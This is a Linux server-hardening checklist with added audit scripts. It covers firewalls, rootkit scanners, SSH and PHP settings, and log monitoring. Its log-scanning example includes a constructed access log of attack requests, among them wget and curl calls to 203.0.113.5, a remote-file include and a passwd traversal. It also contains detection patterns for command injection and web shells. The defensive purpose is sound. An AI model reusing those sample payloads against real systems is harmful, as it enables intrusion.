100 tweaks to secure your server against hack attempts
How to Secure your Linux Server:
1. Kernel recompile with grsecurity
2. firewall = CSF
3. Stop unnecessary processes
4. Install Logcheck
5. Install Logwatch
You can also tune host.conf and sysctl.conf; see:
http://www.eth0.us/node/104
To modify Logwatch, SSH into the server and log in as root.
At the command prompt type:
nano -w /etc/log.d/conf/logwatch.conf
(Newer Logwatch releases keep the file at /etc/logwatch/conf/logwatch.conf instead.)
You will see this entry:
MailTo = root
Change it to:
MailTo = your@email.com
Note: Set the e-mail address to an offsite account in case you get hacked; a report that only lands in root's local mailbox is worthless once the box is owned, because the intruder can read or delete it.
Detail = Low
Change that to Medium or High (the numeric equivalents are Detail = 5 and Detail = 10).
Note: High gives you the most detailed report of all logged actions. Save and exit.
6. On a cPanel server, check the WHM configuration
7. OpenSSH configuration check
8. Switch from proftpd to pure-ftpd (pure-ftpd is recommended as the more secure of the two)
9. Rootkit Hunter
rkhunter:
1. Log in to your server via SSH as root. Then type:
[root@server ~]# cd /usr/local/src/
Download RKHunter version 1.1.4 (the release this page was written against; in practice fetch the current release from the project site and verify its published checksum rather than installing an old tarball pulled over plain HTTP):
[root@server ~]# wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz
Extract the files and run the installer:
[root@server ~]# tar -xzvf rkhunter-1.1.4.tar.gz
[root@server ~]# cd rkhunter
[root@server ~]# ./installer.sh
2. Now set up RKHunter to e-mail you daily scan reports:
[root@server ~]# nano -w /etc/cron.daily/rkhunter.sh
Add the following:
#!/bin/bash
(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)
Replace the e-mail address above with your own.
It is best to send the e-mail off-site so that
if the box IS compromised the attacker can't erase the scan report without breaking into a second server too. The same caveat applies to rkhunter itself: it runs on the host it is checking, so a rootkit that hooks the kernel or trojans the binaries it depends on can blind it. Treat a clean report as a weak signal and a dirty one as a strong one.
Make the script executable:
[root@server ~]# chmod +x /etc/cron.daily/rkhunter.sh
10. Chkrootkit
Installing chkrootkit:
[root@server ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
[root@server ~]# tar xvfz chkrootkit.tar.gz
[root@server ~]# ./chkrootkit*/chkrootkit
Note: chkrootkit shells out to the system's own ps, netstat, ls and friends, so a rootkit that has replaced those can hide from it. If you need a trustworthy answer, run it against known-good copies of those binaries or from rescue media.
11. mod_security
12. mod_evasive
13. Host spoof protection
14. Operating System check
15. Name server configuration check
16. Disk check
17. Kernel check
18. Apache tune and check
19. MySQL tune and check
20. Enhanced log rotation
21. Day of the week backup rotations
22. Secure /tmp /var/tmp /dev/shm
23. Libsafe for 2.4 kernels
24. Exploit check
25. Delete unnecessary OS users
26. Disable open DNS recursion
27. Enhanced path protection
28. Remove SUID/GUID from binaries
29. PHP hardening
30. phpsuexec
31. Disable vulnerable phpBB installs
32. Initial cPanel configuration
33. Check iptables is configured
34. Check incoming MySQL port
35. Check /etc/cron.daily/logrotate
36. Check /etc/resolv.conf for localhost entry
37. Check /etc/named.conf for recursion restrictions
38. Check server runlevel
39. Check nobody cron
40. Check Operating System support
41. Check SSHv1 is disabled
42. Check SSH on non-standard port
43. Check SSH PasswordAuthentication
44. Check telnet port 23 is not in use
45. Check shell limits
46. Check Background Process Killer
47. Check root forwarder
48. Check exim for extended logging
49. Check php for enable_dl: enable_dl = Off
50. Check php for disable_functions:
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
Note: allow_url_fopen is an ini directive, not a function, so listing it in disable_functions has no effect; set it on its own line as allow_url_fopen = Off (and, on PHP 5.2 and later, allow_url_include = Off). Disabling functions is a speed bump, not a sandbox: anything you leave off the list (pcntl_exec, for instance) stays callable, so pair it with open_basedir and phpsuexec.
51. Check php for register_globals: register_globals = Off
52. Check php open_basedir protection (restricts each vhost's scripts to its own document root and a scratch directory)
53. Check phpsuexec
54. Check cPanel login is SSL only
55. Check boxtrapper is disabled
56. Check max emails per hour is set
57. Check whether users can reset passwords via email
58. Check whether native cPanel SSL is enabled
59. Check compilers
60. Check Anonymous FTP access
61. Check allow remote domains
62. Check block common domains
63. Check allow park domains
64. Check package updates
65. Check security updates
66. Check melange chat server
67. service cups stop; chkconfig cups off
68. service xfs stop; chkconfig xfs off
69. service atd stop; chkconfig atd off
70. service nfslock stop; chkconfig nfslock off
71. service canna stop; chkconfig canna off
72. service FreeWnn stop; chkconfig FreeWnn off
73. service cups-config-daemon stop; chkconfig cups-config-daemon off
74. service iiim stop; chkconfig iiim off
75. service mDNSResponder stop; chkconfig mDNSResponder off
76. service nifd stop; chkconfig nifd off
77. service rpcidmapd stop; chkconfig rpcidmapd off
78. service bluetooth stop; chkconfig bluetooth off
79. service anacron stop; chkconfig anacron off
80. service gpm stop; chkconfig gpm off
81. service saslauthd stop; chkconfig saslauthd off
82. service avahi-daemon stop; chkconfig avahi-daemon off
83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off
84. service hidd stop; chkconfig hidd off
85. service pcscd stop; chkconfig pcscd off
86. service sbadm stop; chkconfig sbadm off
87. service webmin stop; chkconfig webmin off
88. Add a load alert script run from a 1-minute cron (* * * * * /root/loadalert.sh):
#!/bin/bash
# uptime alert script: mail when the 1-minute load average exceeds a threshold
THRESHOLD=4
MAILTO=mailadd@mail.com
# /proc/loadavg is easier to parse than uptime's locale-dependent output;
# keep only the integer part of the 1-minute average
UP=$(cut -d. -f1 /proc/loadavg)
if [ "$UP" -gt "$THRESHOLD" ]
then
    uptime | mail -s "**SERVER LOAD is $UP" "$MAILTO"
fi
Note: do not wrap the uptime | mail line in backticks. Backticks run the pipeline and then try to execute its (empty) output as a command, so the mail is sent but the script errors every minute.
89. Ignore ping:
[root@server ~]# iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
[root@server ~]# echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
[root@server ~]# vi /etc/sysctl.conf
Append the following line so the setting survives a reboot:
net.ipv4.icmp_echo_ignore_all = 1
Note: drop only echo-request, not all of ICMP. A blanket "-p icmp -j DROP" also discards the fragmentation-needed messages that path MTU discovery depends on, which shows up as connections that stall on large transfers. Hiding from ping buys little against a scanner that probes the TCP ports anyway.
90. Find world-writable directories (the usual "777" check).
[root@server ~]# find / -xdev -type d -perm -0002 ! -perm -1000
Note: -perm -0002 catches every world-writable directory, not just those that are exactly 777, and ! -perm -1000 skips sticky-bit directories such as /tmp, which are world-writable by design. -xdev keeps find from wandering into /proc and network mounts.
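An added example, not from the original page, that turns items 28 and 90 into a repeatable check: it lists setuid/setgid files and world-writable directories, and diffs the setuid list against a saved baseline so that a new setuid binary (the classic leave-behind after a privilege-escalation exploit) shows up as a one-line change. The directory tree it runs on is constructed in a temporary directory; the baseline path /var/lib/setid.baseline in the usage comment is an assumed location.

```shell
#!/bin/sh
# Added example: setuid/setgid and world-writable audit with a baseline diff.
# Usage:  audit_perms /                                            one-off report
#         audit_perms / | grep '^SETID' | sort > /var/lib/setid.baseline
#         setid_changes /var/lib/setid.baseline /                  from cron; mail if non-empty

audit_perms() {
    # -perm -4000 / -2000: that bit is set, whatever the other bits are
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null \
        | sed 's/^/SETID: /'
    # world-writable directories without the sticky bit; /tmp-style 1777
    # directories are world-writable by design and are skipped
    find "$1" -xdev -type d -perm -0002 ! -perm -1000 -print 2>/dev/null \
        | sed 's/^/WORLDWRITABLE: /'
}

# Setuid entries that appeared (>) or vanished (<) relative to the baseline.
setid_changes() {
    audit_perms "$2" | grep '^SETID' | sort | diff "$1" - | grep '^[<>]' || true
}

# Constructed sample tree (not a real filesystem), exercised below.
TREE=$(mktemp -d)
BASELINE=$(mktemp)
trap 'rm -rf "$TREE" "$BASELINE"' EXIT
mkdir -p "$TREE/bin" "$TREE/usr/bin" "$TREE/tmp" "$TREE/home/web/upload"
: > "$TREE/bin/su";       chmod 4755 "$TREE/bin/su"        # legitimate setuid
: > "$TREE/usr/bin/wall"; chmod 2755 "$TREE/usr/bin/wall"  # legitimate setgid
: > "$TREE/bin/ls";       chmod 0755 "$TREE/bin/ls"        # ordinary binary
chmod 1777 "$TREE/tmp"                                     # sticky: skipped
chmod 0777 "$TREE/home/web/upload"                         # flagged

# Take the baseline while the tree is known-good.
audit_perms "$TREE" | grep '^SETID' | sort > "$BASELINE"

# Simulate a backdoor: a copy of a shell made setuid inside a web-writable dir.
: > "$TREE/home/web/upload/.sh"; chmod 4755 "$TREE/home/web/upload/.sh"

audit_perms "$TREE"
setid_changes "$BASELINE" "$TREE"   # one line: "> SETID: .../home/web/upload/.sh"
```

Keep the baseline off the box (or at least outside any directory the web user can write), and regenerate it only after a package update you have reviewed, otherwise the diff is what you are trying to detect.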
91. Check for open ports using nmap. Run it from another host so you see what the network sees (e.g. nmap -sS -sU -p- your.server.ip) and compare the result with netstat -tulpn on the box itself; a listener that appears in one list but not the other needs explaining.
92. Disable version output for Apache
To hide the Apache version, SSH into the server and log in as root.
At the command prompt type: pico /etc/httpd/conf/httpd.conf
Scroll (way) down and set the following directives:
ServerSignature Off
ServerTokens Prod
(ServerSignature Off removes the version footer from error pages; ServerTokens Prod trims the Server response header to just "Apache". The version string is a hint to attackers, not a control, so this is cosmetic hardening: keep patching.)
Restart Apache
At the command prompt type:
[root@server ~]# /etc/rc.d/init.d/httpd restart
93. Change the ssh ListenAddress in /etc/ssh/sshd_config so sshd binds only to the management interface.
94. PermitRootLogin no (log in as an unprivileged user and su or sudo; this also makes root activity traceable to a named person in the logs).
95. Add a root login alert
As root, edit /root/.bash_profile and append:
echo "ALERT - Root Shell Access on: $(date) $(who am i)" | mail -s "Alert: Root Access from $(who am i | awk '{print $NF}')" your@email.com
Note: this must be one line; split across two, the shell runs the echo and the mail as separate commands and nothing is sent. who am i reports the originating tty and host even after su, and $NF avoids hard-coding a field position that varies with the who output format. Anyone who already has root can edit this file, so send the mail off-site and treat a missing alert as suspicious rather than reassuring.
96. Set a legal banner. A message in /etc/motd is shown only after login; for a pre-authentication notice set Banner /etc/issue.net in /etc/ssh/sshd_config and put the text in that file.
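An added example, not from the original page, that checks items 41 to 43 and 93 to 94 against an sshd_config in one pass. It resolves duplicate keywords the way sshd does (first uncommented occurrence wins, anything after a Match block is conditional and ignored here). The two sample configs are constructed: one resembles a stock CentOS-era default, the other is hardened per this list; 203.0.113.10 and port 2222 are placeholders.

```shell
#!/bin/sh
# Added example: audit an sshd_config for the SSH items in this list.
# Usage: audit_sshd /etc/ssh/sshd_config   (prints one WARN line per weak setting)

# Effective value of a keyword. sshd uses the FIRST uncommented occurrence and
# keywords are case-insensitive; settings after a Match block are conditional,
# so stop there.
ssh_opt() {
    awk -v key="$2" '
        tolower($1) == "match"      { exit }
        tolower($1) == tolower(key) { print $2; exit }
    ' "$1"
}

lower() { printf '%s' "$1" | tr 'A-Z' 'a-z'; }

audit_sshd() {
    cfg="$1"

    proto=$(ssh_opt "$cfg" Protocol)
    # Anything other than an explicit "2" either allows SSHv1 ("2,1", "1") or
    # relies on the build default, which on old releases was "2,1".
    # (OpenSSH 7.6+ dropped SSHv1 entirely and ignores this keyword.)
    [ "$proto" = "2" ] || echo "WARN: Protocol is '${proto:-unset}'; set 'Protocol 2' (item 41)"

    root=$(lower "$(ssh_opt "$cfg" PermitRootLogin)")
    # prohibit-password still lets root in with a key; item 94 wants 'no'.
    [ "$root" = "no" ] || echo "WARN: PermitRootLogin is '${root:-unset}'; want 'no' (item 94)"

    pw=$(lower "$(ssh_opt "$cfg" PasswordAuthentication)")
    [ "$pw" = "no" ] || echo "WARN: PasswordAuthentication is '${pw:-unset}'; want 'no' (item 43)"

    port=$(ssh_opt "$cfg" Port)
    { [ -n "$port" ] && [ "$port" != "22" ]; } || echo "WARN: sshd on default port 22 (item 42)"

    listen=$(ssh_opt "$cfg" ListenAddress)
    [ -n "$listen" ] || echo "WARN: no ListenAddress; sshd binds every interface (item 93)"
}

# Constructed sample configs (not real server files).
WEAK_CFG=$(mktemp); HARD_CFG=$(mktemp)
trap 'rm -f "$WEAK_CFG" "$HARD_CFG"' EXIT
cat > "$WEAK_CFG" <<'EOF'
#Port 22
Protocol 2,1
#ListenAddress 0.0.0.0
PermitRootLogin yes
PasswordAuthentication yes
UsePAM yes
EOF
cat > "$HARD_CFG" <<'EOF'
Port 2222
Protocol 2
ListenAddress 203.0.113.10
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
EOF

echo "== weak =="; audit_sshd "$WEAK_CFG"
echo "== hardened =="; audit_sshd "$HARD_CFG"   # prints nothing
```

The commented-out defaults in the weak file (#Port 22, #ListenAddress 0.0.0.0) are deliberately treated as unset, because that is how sshd treats them. Run sshd -t after editing the real file so a typo does not lock you out on the next restart.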
97. Use locate to look for common IRC bots, bouncers and web shells. Run updatedb first so the database is current; a hit is a lead to investigate, not proof of compromise.
locate shell.php
locate irc
locate eggdrop
locate bnc
locate BNC
locate ptlink
locate BitchX
locate guardservices
locate psyBNC
locate .rhosts
98. Perform UDP and TCP scans from outside here:
http://www.hackerwatch.org/probe
Also, to check whether your Internet connection has reverse DNS, this is a good URL:
https://www.grc.com/x/ne.dll?bh0bkyd2
99. Check the log files:
[root@server ~]# tail -f /var/log/secure
[root@server ~]# tail -f /var/log/messages
[root@server ~]# lastlog (/var/log/lastlog is a binary database, so read it with the lastlog command; last shows recent logins and lastb the failed ones)
[root@server ~]# tail -f /var/log/security (FreeBSD; on Linux the kernel and ICMP/TCP messages go to /var/log/messages and dmesg)
and the other log files (depending on your OS distro) of the services running, to see if there are any issues.
vmstat
Displays information about memory, cpu and disk.
Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)
mpstat
Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)
iostat
This command displays statistics about the disk system.
Useful options:
-d - Gives the device utilization report.
-k - Display statistics in kilobytes per second.
Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)
sar
Displays overall system performance.
ps
Displays the status of all known processes. Check whether the server has hidden processes by comparing ps against another vantage point (ls /proc, netstat -tulpn): a process that owns a /proc entry or a listening socket but does not appear in ps is a sign of a rootkit.
100. lsof
List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command. lsof -i lists every open network socket with its owning process; lsof +L1 lists files that have been unlinked but are still held open, a classic place to stash a downloaded payload.
[root@server ~]# chmod -R 700 /etc/rc.d/init.d/*
(Restricting the init scripts to root stops unprivileged users from reading them for hints about what is installed; it does not stop anything from running, and rpm -Va below will report the changed modes.)
Use rpm -Va to find out whether a packaged file has been modified (it compares size, mode, checksum and owner against the RPM database; a rootkit that also edits the database defeats it, so AIDE below is the stronger check).
* Apply security patches to vulnerable software (ie. patch -p1 < patchfile)
* Remove all unneeded ttys and console logins by removing their entries from /etc/securetty
* Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
* Set a password on the boot loader (both lilo and grub support this) so that anyone with console access cannot simply boot into single-user mode
* Monitor the system (nagios or big brother)
Install AIDE (Advanced Intrusion Detection Environment), a free replacement for Tripwire. Build its database right after installation and keep a copy of the database and the aide binary off the box; a baseline taken after a compromise is useless.
http://www.cs.tut.fi/~rammer/aide.html
Testing phase, once in production:
Use tools like nessus, nikto and nmap to run a penetration test and see how well the server holds up.
Also do a stress test.
Grep the Apache domain logs for URL-encoded command injection (cPanel keeps per-domain logs in /usr/local/apache/domlogs):
[root@server ~]# find /usr/local/apache/domlogs -type f -exec grep -EiH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;
Note: the grouping and alternation here are extended-regex syntax. egrep and grep -E are the same thing on both FreeBSD and CentOS; plain grep without -E treats the parentheses and | literally and matches nothing useful. Also look for the space encoded as + and for %2520 double encoding, and expect false positives such as "touch%20screen" or "sh%20" at the end of a longer word.
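The following is an added example, not from the original page, that runs the domlogs grep above over constructed sample access-log lines, tagging each hit. It goes one step beyond the page in two ways: the space may be encoded as either %20 or +, and a second pattern flags remote-file-include attempts (a parameter whose value begins with http://, https:// or ftp://), which the page's command-name regex does not catch. All IP addresses and paths in the sample log are made up.

```shell
#!/bin/sh
# Added example: scan an Apache access log for URL-encoded command injection
# and remote-file-include URLs.
# Live usage on a cPanel box:  grep -rEiH -- "$CMD_RE" /usr/local/apache/domlogs

# A space can arrive as %20 or as +. The keyword must start a token so that
# "/docs/wget-guide.html" does not match; note this also means "bash%20" no
# longer matches via "sh", so add any extra names you care about to the list.
CMD_RE='(^|[^a-z_/.-])(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)(%20|[+])'
# A parameter whose value is a URL: the classic PHP include() injection.
RFI_RE='=(https?|ftp)(:|%3a)(//|%2f%2f)'

scan_log() {
    # $1 = log file; tag each suspicious line with the pattern that fired
    grep -Ei -- "$CMD_RE" "$1" | sed 's/^/CMD: /'
    grep -Ei -- "$RFI_RE" "$1" | sed 's/^/RFI: /'
}

# Constructed sample log in Apache combined format (not real traffic).
LOG=$(mktemp)
trap 'rm -f "$LOG"' EXIT
cat > "$LOG" <<'EOF'
198.51.100.7 - - [12/Mar/2009:10:01:02 +0000] "GET /index.php?page=http://203.0.113.5/shell.txt? HTTP/1.1" 200 1234
198.51.100.7 - - [12/Mar/2009:10:01:09 +0000] "GET /cgi-bin/cmd.cgi?cmd=wget%20http://203.0.113.5/x.pl HTTP/1.1" 200 88
192.0.2.44 - - [12/Mar/2009:10:02:00 +0000] "GET /page.php?f=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 210
198.51.100.7 - - [12/Mar/2009:10:02:31 +0000] "POST /upload.php?c=cd+/tmp;curl+http://203.0.113.5/x HTTP/1.1" 200 12
192.0.2.9 - - [12/Mar/2009:10:03:15 +0000] "GET /search?q=touch%20screen HTTP/1.1" 200 5120
192.0.2.9 - - [12/Mar/2009:10:04:00 +0000] "GET /docs/wget-guide.html HTTP/1.1" 200 9001
EOF

scan_log "$LOG"
# Expected: CMD hits on the wget%20, cd+/curl+ and touch%20 lines (the last
# one is a false positive from a legitimate search), one RFI hit on the
# page=http://... line, and nothing for the traversal or the static page.
```

The traversal attempt (..%2F..%2Fetc%2Fpasswd) is not flagged because it is outside what these two patterns look for; treat this as triage, then read the full request lines for the source IPs it surfaces.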